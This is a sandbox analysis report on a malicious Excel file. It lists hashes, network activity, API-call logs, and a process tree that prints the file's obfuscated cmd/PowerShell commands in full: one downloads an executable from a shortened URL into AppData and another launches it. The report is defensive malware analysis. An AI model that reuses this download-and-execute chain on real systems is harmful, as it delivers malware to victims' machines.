Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 6, 2021, 5:59 p.m.	April 6, 2021, 6:01 p.m.

Size	56.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 21:17:44 2020, Last Saved Time/Date: Tue Sep 22 19:16:56 2020, Security: 1
MD5	`9e227b07643afd3444c4d30f0c47c3cf`
SHA256	`d3345db33851543b968f728d2a342c49dc72b0dc633da851518d8585e53af3ce`
CRC32	`62802116`
ssdeep	`1536:1XnSGiysRchNXHfA1MiWhZFGkEld+Dr7OnkdyYWptOr5TwjJ1t:1XnSGiysRchNXHfA1MiWhZFGkEld+DrS`
Yara	Microsoft_Office_Document_Zero - Microsoft Office Document Signature Zero

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\9e227b07643afd3444c4d30f0c47c3cf.xls
1016
- cmd.exe cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
  2236
  - powershell.exe powershell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
    2932
- cmd.exe cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
  584
  - powershell.exe powershell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
    2856

Name	Response	Post-Analysis Lookup
tinyurl.com	A 172.67.1.225 A 104.20.139.65 A 104.20.138.65	104.20.139.65

IP Address	Status	Action
104.20.138.65	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 6, 2021, 5:59 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 6, 2021, 5:59 p.m.			0	0
IsDebuggerPresent April 6, 2021, 5:59 p.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: Start-Process : This command cannot be executed due to the error: This version console_handle: 0x00000023	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: of %1 is not compatible with the version of Windows you're running. Check your console_handle: 0x0000002f	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: computer's system information to see whether you need a x86 (32-bit) or x64 (64 console_handle: 0x0000003b	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: -bit) version of the program, and then contact the software publisher. console_handle: 0x00000047	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: At line:1 char:33 console_handle: 0x00000053	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: + Start-Sleep 12; sTArt-`P`R`ocess <<<< $env:appdata\re.exe console_handle: 0x0000005f	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x0000006b	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: erationException console_handle: 0x00000077	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x00000083	1	1
WriteConsoleW April 6, 2021, 5:59 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x0000008f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 89 events)

Time & API	Arguments	Status	Return
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eae60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eae60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eae60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eae60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eae60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eae60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea9e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea9e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea9e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eab20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e30f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 5:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 6, 2021, 5:59 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://tinyurl.com/y3psaqmm
suspicious_features	GET method with no useragent header				suspicious_request	GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated

Performs some HTTP requests (2 events)

request	GET https://tinyurl.com/y3psaqmm
request	GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated

Allocates read-write-execute memory (usually to unpack itself) (50 out of 284 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dc81000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d631000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01faa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d632000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fda000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fdc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fd9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
